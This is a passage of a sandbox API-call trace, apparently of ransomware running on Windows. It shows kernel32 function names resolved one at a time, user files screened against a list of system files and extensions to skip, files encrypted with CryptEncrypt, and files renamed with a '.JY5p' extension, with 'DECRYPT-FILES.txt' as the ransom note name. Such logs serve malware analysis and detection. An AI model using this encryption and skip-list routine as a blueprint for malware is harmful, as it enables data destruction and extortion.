lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.717] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.717] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.717] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.717] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.717] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.717] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.717] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.717] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.717] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.717] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.718] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.718] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.718] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.718] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.718] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.718] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.718] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.718] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.718] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.718] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.718] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.718] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.718] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.718] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.718] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.718] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.718] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.718] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.719] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.719] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.719] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.719] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.719] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.719] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.719] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.719] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.719] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.719] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.719] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.719] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.719] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.719] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav") returned 66 [0076.719] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav.JY5p") returned 71 [0076.720] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zaz7ryw dljtx1j.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav.JY5p" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zaz7ryw dljtx1j.wav.jy5p"), dwFlags=0x0) returned 1 [0076.720] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.720] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.721] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.721] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5873ea50, ftCreationTime.dwHighDateTime=0x1d4ceae, ftLastAccessTime.dwLowDateTime=0xc2677f60, ftLastAccessTime.dwHighDateTime=0x1d4c690, ftLastWriteTime.dwLowDateTime=0xc2677f60, ftLastWriteTime.dwHighDateTime=0x1d4c690, nFileSizeHigh=0x0, nFileSizeLow=0x10152, dwReserved0=0x0, dwReserved1=0x0, cFileName="9hYC b9 OAgc.png", cAlternateFileName="9HYCB9~1.PNG")) returned 1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="DECRYPT-FILES.txt") returned -1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="autorun.inf") returned -1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="boot.ini") returned -1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="desktop.ini") returned -1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="ntuser.dat") returned -1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="iconcache.db") returned -1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="bootsect.bak") returned -1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="ntuser.dat.log") returned -1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="thumbs.db") returned -1 [0076.721] lstrcmpiW (lpString1="9hYC b9 OAgc.png", lpString2="Bootfont.bin") returned -1 [0076.721] lstrlenW (lpString="9hYC b9 OAgc.png") returned 16 [0076.721] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0076.721] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0076.721] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0076.721] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0076.721] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.721] lstrlenW (lpString="9hYC b9 OAgc.png") returned 16 [0076.721] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.721] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="9hYC b9 OAgc.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png" [0076.721] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9hyc b9 oagc.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.722] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=65874) returned 1 [0076.722] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.722] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0076.722] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.722] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.722] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.722] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.723] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0076.724] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.724] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0076.725] CloseHandle (hObject=0x444) returned 1 [0076.725] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.725] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.726] CloseHandle (hObject=0x0) returned 0 [0076.726] CloseHandle (hObject=0x440) returned 1 [0076.727] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.727] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.727] GetTickCount () returned 0x114bb16 [0076.727] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.728] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.728] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.728] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.728] lstrlenA (lpString="kernel32.dll") returned 12 [0076.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.728] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.728] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.729] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.729] lstrlenA (lpString="ADDATOMA") returned 8 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.729] lstrlenA (lpString="ADDATOMW") returned 8 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.729] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.729] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.729] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.729] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.729] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.729] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.729] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.729] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.729] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.729] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.729] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.729] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.729] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.729] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.729] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.730] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.730] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.730] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.730] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.730] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.730] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.730] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.730] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.730] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.730] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.730] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.730] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.730] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.730] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.730] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.730] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.730] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.731] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.731] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.731] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.731] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.731] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.731] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.731] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.731] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.731] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.731] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, 